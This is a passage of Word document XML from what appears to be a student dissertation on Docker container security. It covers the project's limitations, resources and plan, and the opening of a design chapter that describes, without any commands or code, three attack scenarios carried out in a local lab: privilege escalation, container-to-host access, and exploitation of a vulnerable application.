      <w:r w:rsidR="009517B1">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00213435">
        <w:t>Docker environment</w:t>
      </w:r>
      <w:r w:rsidR="003033B4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00732A5A">
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="003033B4">
        <w:t xml:space="preserve">ecurity </w:t>
      </w:r>
      <w:r w:rsidR="00732A5A">
        <w:t>breaches</w:t>
      </w:r>
      <w:r w:rsidR="003033B4">
        <w:t xml:space="preserve"> can occur </w:t>
      </w:r>
      <w:r w:rsidR="009517B1">
        <w:t>due to many reasons, such as negligence, misuse</w:t>
      </w:r>
      <w:r w:rsidR="00732A5A">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="009517B1">
        <w:t xml:space="preserve"> tools, and accident. For such cases, an ethical form is signed, and the attack is carried out on a </w:t>
      </w:r>
      <w:r w:rsidR="00732A5A">
        <w:t xml:space="preserve">locally </w:t>
      </w:r>
      <w:r w:rsidR="00120A8C">
        <w:t xml:space="preserve">setup </w:t>
      </w:r>
      <w:r w:rsidR="00732A5A">
        <w:t>Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E1B25" w14:textId="61E54E38" w:rsidR="00732A5A" w:rsidRDefault="00732A5A" w:rsidP="00734A5B">
      <w:r>
        <w:t xml:space="preserve">On the other side, this project has </w:t>
      </w:r>
      <w:r w:rsidR="00DC281B">
        <w:t>several</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> limitations. Firstly, the project’s main research body is limited</w:t>
      </w:r>
      <w:r w:rsidR="00DC281B">
        <w:t xml:space="preserve"> to examine Docker security with misconfigured or poisoned images. It is also limited to use Docker images of</w:t>
      </w:r>
      <w:r w:rsidR="00470F71">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00DC281B">
        <w:t xml:space="preserve"> Debian family, such as </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00DC281B">
        <w:t xml:space="preserve"> and centos. Besides, the project </w:t>
      </w:r>
      <w:r w:rsidR="00DC281B">
        <w:lastRenderedPageBreak/>
        <w:t>scope is on Docker only, and therefore other containerisation technologies are not</w:t>
      </w:r>
      <w:r w:rsidR="0060612D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00842B57">
        <w:t>included and considered. In addition, the security attacks do not involve any production environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8E9C90" w14:textId="1A3CAF7A" w:rsidR="00842B57" w:rsidRDefault="00842B57" w:rsidP="00734A5B">
      <w:r>
        <w:t xml:space="preserve">The project’s main cornerstone is the literature review part. However, as Docker is </w:t>
      </w:r>
      <w:r w:rsidR="00F46868">
        <w:t>a recent technology</w:t>
      </w:r>
      <w:r w:rsidR="00470F71">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F46868">
        <w:t>there is not that much research about it.</w:t>
      </w:r>
      <w:r w:rsidR="00470F71">
        <w:t xml:space="preserve"> In addition, the author lacks deep knowledge and understanding of the research topic and may affect the project</w:t>
      </w:r>
      <w:r w:rsidR="00842742">
        <w:t>’s outcome</w:t>
      </w:r>
      <w:r w:rsidR="00470F71">
        <w:t xml:space="preserve">. Further, the time given for the project is </w:t>
      </w:r>
      <w:r w:rsidR="00842742">
        <w:t>minimal</w:t>
      </w:r>
      <w:r w:rsidR="00470F71">
        <w:t xml:space="preserve"> and tight</w:t>
      </w:r>
      <w:r w:rsidR="00842742">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00470F71">
        <w:t>and may impact the project’s quality and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25249FE2" w14:textId="35003178" w:rsidR="00C31417" w:rsidRDefault="00C31417" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc87032927"/>
      <w:r>
        <w:t>RESOURCES AND PLANNING</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="637692C5" w14:textId="07150696" w:rsidR="00C31417" w:rsidRDefault="00C31417" w:rsidP="00C31417">
      <w:r>
        <w:t>The resources used in this project are the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA4ABC" w14:textId="627ADFE3" w:rsidR="00C31417" w:rsidRDefault="00C31417" w:rsidP="00C31417">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A laptop with internet connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC0306" w14:textId="72F01D1F" w:rsidR="00C31417" w:rsidRDefault="004E1FB6" w:rsidP="00C31417">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00C31417">
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B187CEB" w14:textId="138BD3CB" w:rsidR="00C31417" w:rsidRDefault="00C31417" w:rsidP="00C31417">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7648D20F" w14:textId="66E0CA2C" w:rsidR="00C31417" w:rsidRDefault="00895FE1" w:rsidP="00C31417">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Academic journals, such as google scholar, IEEE digital library etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B8DB64" w14:textId="49A4B874" w:rsidR="00895FE1" w:rsidRDefault="00895FE1" w:rsidP="00C31417">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Microsoft office packages and Gantt chart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD8682" w14:textId="0BDF7D96" w:rsidR="009C00CC" w:rsidRDefault="00895FE1" w:rsidP="009C00CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Text editor, </w:t>
      </w:r>
      <w:r w:rsidR="00F84BB9">
        <w:t>like vim for writing Docker images scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E199D1" w14:textId="77777777" w:rsidR="00F84BB9" w:rsidRDefault="00F84BB9" w:rsidP="00F84BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B30874" w14:textId="3992D583" w:rsidR="002662EE" w:rsidRDefault="00F84BB9" w:rsidP="00F84BB9">
      <w:r>
        <w:t>The project’s plan is created based on the research design process (</w:t>
      </w:r>
      <w:r w:rsidR="00721CFC">
        <w:t xml:space="preserve">see </w:t>
      </w:r>
      <w:r>
        <w:t>figure 8</w:t>
      </w:r>
      <w:r w:rsidR="00721CFC">
        <w:t xml:space="preserve"> on the above</w:t>
      </w:r>
      <w:r>
        <w:t>), containing six main components. Figure 9 shows the project</w:t>
      </w:r>
      <w:r w:rsidR="002662EE">
        <w:t xml:space="preserve"> plan with the key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> milestones</w:t>
      </w:r>
      <w:r w:rsidR="002662EE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327AAD33" w14:textId="08A15621" w:rsidR="00F84BB9" w:rsidRDefault="002662EE" w:rsidP="002662EE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="483B2901" wp14:editId="55C1D624">
            <wp:extent cx="4425950" cy="1835150"/>
            <wp:effectExtent l="0" t="0" r="50800" b="127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071D2E8" w14:textId="6602AAEE" w:rsidR="002662EE" w:rsidRDefault="002662EE" w:rsidP="002662EE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc86858600"/>
      <w:bookmarkStart w:id="91" w:name="_Toc86867490"/>
      <w:r w:rsidRPr="002662EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="002662EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002662EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002662EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="002662EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002662EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: the project plan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="5AF57C3E" w14:textId="16AC40A0" w:rsidR="00CE5A27" w:rsidRDefault="00CE5A27" w:rsidP="00CE5A27"/>
    <w:p w14:paraId="6937F564" w14:textId="77777777" w:rsidR="00CE5A27" w:rsidRPr="00CE5A27" w:rsidRDefault="00CE5A27" w:rsidP="00CE5A27"/>
    <w:p w14:paraId="0A16AE26" w14:textId="4576445D" w:rsidR="002662EE" w:rsidRDefault="002662EE" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc87032928"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="65297588" w14:textId="5F8DB2E1" w:rsidR="00120A8C" w:rsidRDefault="00120A8C" w:rsidP="00120A8C">
      <w:r>
        <w:t xml:space="preserve">This chapter covered the various approaches and methodologies used to develop </w:t>
      </w:r>
      <w:r w:rsidR="005E5432">
        <w:t>the project</w:t>
      </w:r>
      <w:r w:rsidR="00BB3965">
        <w:t xml:space="preserve"> in a systematic view and coherent way</w:t>
      </w:r>
      <w:r w:rsidR="005E5432">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008E2328">
        <w:t xml:space="preserve"> The project uses experiment and observation methods through scientific evidence to examine Docker security, and thus uses positivism as its research philosophy. It also uses cross-sectional time </w:t>
      </w:r>
      <w:r w:rsidR="00BB3965">
        <w:t>horizon</w:t>
      </w:r>
      <w:r w:rsidR="008E2328">
        <w:t xml:space="preserve"> as data is observed and collected in a short period of time.</w:t>
      </w:r>
      <w:r w:rsidR="00BB3965">
        <w:t xml:space="preserve"> Data is collected through research, experiment, and observation, and using secondary sources, such as google scholar and IEEE library. This chapter has helped the author to establish a structured view </w:t>
      </w:r>
      <w:r w:rsidR="00A26A3C">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00BB3965">
        <w:t xml:space="preserve">the project </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00195A57">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00195A57">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB3965">
        <w:t xml:space="preserve">achieve </w:t>
      </w:r>
      <w:r w:rsidR="00195A57">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00BB3965">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F0058">
        <w:t>objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BB56F4" w14:textId="4B530387" w:rsidR="00BB3965" w:rsidRPr="00120A8C" w:rsidRDefault="00BB3965" w:rsidP="00120A8C">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="008F0058">
        <w:t xml:space="preserve">following chapter presents the design and implementation process used for the experiment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200A9BD7" w14:textId="17951AFC" w:rsidR="002662EE" w:rsidRDefault="002662EE" w:rsidP="002662EE"/>
    <w:p w14:paraId="4E38F277" w14:textId="79BAA38E" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="0821871C" w14:textId="0948EEDA" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="4DFFE514" w14:textId="6D041FD5" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="524619FA" w14:textId="665F5F5D" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="73DA60ED" w14:textId="1BC564C1" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="7EB6EEF1" w14:textId="4AF9818C" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="60EBA436" w14:textId="4B0788FA" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="7B1EC518" w14:textId="667C2799" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="4407F86A" w14:textId="00D1E090" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="0EA0B6ED" w14:textId="469667EF" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="131E05E5" w14:textId="01D4D7B2" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="5D636F4D" w14:textId="77777777" w:rsidR="00CD1685" w:rsidRPr="002662EE" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="6BA5DCE4" w14:textId="77777777" w:rsidR="00732A5A" w:rsidRDefault="00732A5A" w:rsidP="00734A5B"/>
    <w:p w14:paraId="202B888E" w14:textId="77777777" w:rsidR="00696A58" w:rsidRPr="004D70A9" w:rsidRDefault="00696A58" w:rsidP="00696A58"/>
    <w:p w14:paraId="43C9FA07" w14:textId="5CAD1F99" w:rsidR="00696A58" w:rsidRDefault="00CE5A27" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc87032929"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- DESIGN AND IMPLEMENTATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="78A20686" w14:textId="7CA25CF0" w:rsidR="00CE5A27" w:rsidRDefault="00CE5A27" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc87032930"/>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="7BD46CC1" w14:textId="4B4B176E" w:rsidR="009F7527" w:rsidRDefault="009F7527" w:rsidP="009F7527">
      <w:r>
        <w:t xml:space="preserve">In recent years, containerisation has become the prominent technology for portability, scalability, reliability, and speed, replacing the traditional VM technology. By far, Docker is now the most popular container </w:t>
      </w:r>
      <w:r w:rsidR="004C5D9D">
        <w:t>technology.</w:t>
      </w:r>
      <w:r w:rsidR="00C02F03">
        <w:t xml:space="preserve"> However, its security platform has not been tested enough and thus creates </w:t>
      </w:r>
      <w:r w:rsidR="00257C6C">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00C02F03">
        <w:t>big security concern for Docker users, developers, and enterprises. This chapter outlines the design and implementation of</w:t>
      </w:r>
      <w:r w:rsidR="00661969">
        <w:t xml:space="preserve"> conducting security attacks on Docker environment based upon the information and knowledge gained from the literature review. It </w:t>
      </w:r>
      <w:r w:rsidR="00E84EBF">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00661969">
        <w:t>covers all the hardware and tools used, as well as the implementation process of each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C033C2" w14:textId="6CA193C7" w:rsidR="00257C6C" w:rsidRDefault="00257C6C" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc87032931"/>
      <w:r>
        <w:t>PROBLEM FORMULATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="0DAF184E" w14:textId="62B3856F" w:rsidR="00CC18C7" w:rsidRDefault="00CC18C7" w:rsidP="00CC18C7">
      <w:r>
        <w:t>Docker has become the dominant technology in the containerisation industry for many reasons, including speed, flexibility, scalability, and portability.</w:t>
      </w:r>
      <w:r w:rsidR="00BB044C">
        <w:t xml:space="preserve"> Docker is an extension of LXC</w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB044C">
        <w:t xml:space="preserve">and thus has </w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t>many</w:t>
      </w:r>
      <w:r w:rsidR="00BB044C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t>similarities</w:t>
      </w:r>
      <w:r w:rsidR="00BB044C">
        <w:t xml:space="preserve"> with Linux OS. In Docker, images are the building blocks to build a Docker container</w:t>
      </w:r>
      <w:r w:rsidR="008C0EFB">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00055ED0">
        <w:t xml:space="preserve"> are stored in public or private repositories.</w:t>
      </w:r>
      <w:r w:rsidR="008C0EFB">
        <w:t xml:space="preserve"> By default, Docker uses </w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="008C0EFB">
        <w:t>Docker hub as its public repository, enabling users to pull or push images. Simply put, Docker hub is much like google or apple store</w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008C0EFB">
        <w:t xml:space="preserve"> where everyone can download or upload their images. Therefore, a malicious user can</w:t>
      </w:r>
      <w:r w:rsidR="00053416">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A679B">
        <w:t xml:space="preserve">insert a code into an image and upload </w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="005A679B">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005A679B">
        <w:t>Docker hub</w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00651EDA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A679B">
        <w:t>and someone can pull that image</w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00651EDA">
        <w:t xml:space="preserve">more likely to expose </w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00651EDA">
        <w:t>containers and the host to the attacker.</w:t>
      </w:r>
      <w:r w:rsidR="00081A8E">
        <w:t xml:space="preserve"> An attacker can also gain access through an image that is not configured correctly.</w:t>
      </w:r>
      <w:r w:rsidR="00D85F86">
        <w:t xml:space="preserve"> Therefore, this project aims to answer</w:t>
      </w:r>
      <w:r w:rsidR="006B7D13">
        <w:t xml:space="preserve"> the security implications of running untrusted Docker images</w:t>
      </w:r>
      <w:r w:rsidR="006753F6">
        <w:t>, as well as on how attackers gain access through vulnerable or misconfigured images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63949338" w14:textId="5662969A" w:rsidR="00584D36" w:rsidRDefault="000318DB" w:rsidP="00CC18C7">
      <w:r>
        <w:t xml:space="preserve">Figure 10 outlines the various approaches and tools used to solve the above problem. As it can be seen, </w:t>
      </w:r>
      <w:r w:rsidR="00D45789">
        <w:t xml:space="preserve">three </w:t>
      </w:r>
      <w:r w:rsidR="00DF1F82">
        <w:t>different attacks comprising privilege escalation, container to host, and vulnerable application are used to demonstrate the security strength of Docker containers.</w:t>
      </w:r>
      <w:r w:rsidR="009D7532">
        <w:t xml:space="preserve"> The privilege attack uses a user with a limited privilege and a Docker image incorrectly configured to access the host machine, while the container to host attack runs two containers with different configuration</w:t>
      </w:r>
      <w:r w:rsidR="00394726">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009D7532">
        <w:t xml:space="preserve"> to access the host</w:t>
      </w:r>
      <w:r w:rsidR="00394726">
        <w:t xml:space="preserve">. The third scenario is using </w:t>
      </w:r>
      <w:r w:rsidR="00D11DF8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00394726">
        <w:t>vulnerable application downloaded from</w:t>
      </w:r>
      <w:r w:rsidR="00D11DF8">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00394726">
        <w:t xml:space="preserve"> Docker hub. In such </w:t>
      </w:r>
      <w:r w:rsidR="00D11DF8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00394726">
        <w:t>scenario,</w:t>
      </w:r>
      <w:r w:rsidR="00D11DF8">
        <w:t xml:space="preserve"> two containers as attackers used to conduct remote execution through the vulnerable application. Most tools used are Linux, and Docker commands, with a few exceptions. Further, the three attacks use a single </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D11DF8">
        <w:t xml:space="preserve"> laptop </w:t>
      </w:r>
      <w:r w:rsidR="00D11DF8">
        <w:lastRenderedPageBreak/>
        <w:t>with Docker installed.</w:t>
      </w:r>
      <w:r w:rsidR="00E95E86">
        <w:t xml:space="preserve"> An extended and detailed diagram of each attack can be found below in the design section. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196952EE" w14:textId="6B1AB561" w:rsidR="00D31C21" w:rsidRDefault="00B43995" w:rsidP="00D31C21">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00126888" wp14:editId="29D574D0">
            <wp:extent cx="5731510" cy="349885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498850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1D1E91" w14:textId="7751F8AB" w:rsidR="00F95282" w:rsidRDefault="00F95282" w:rsidP="00F95282">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc86858601"/>
      <w:bookmarkStart w:id="97" w:name="_Toc86867491"/>
      <w:r w:rsidRPr="00F95282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00F95282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F95282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F95282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F95282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F95282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: methods and techniques of the various attacks.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
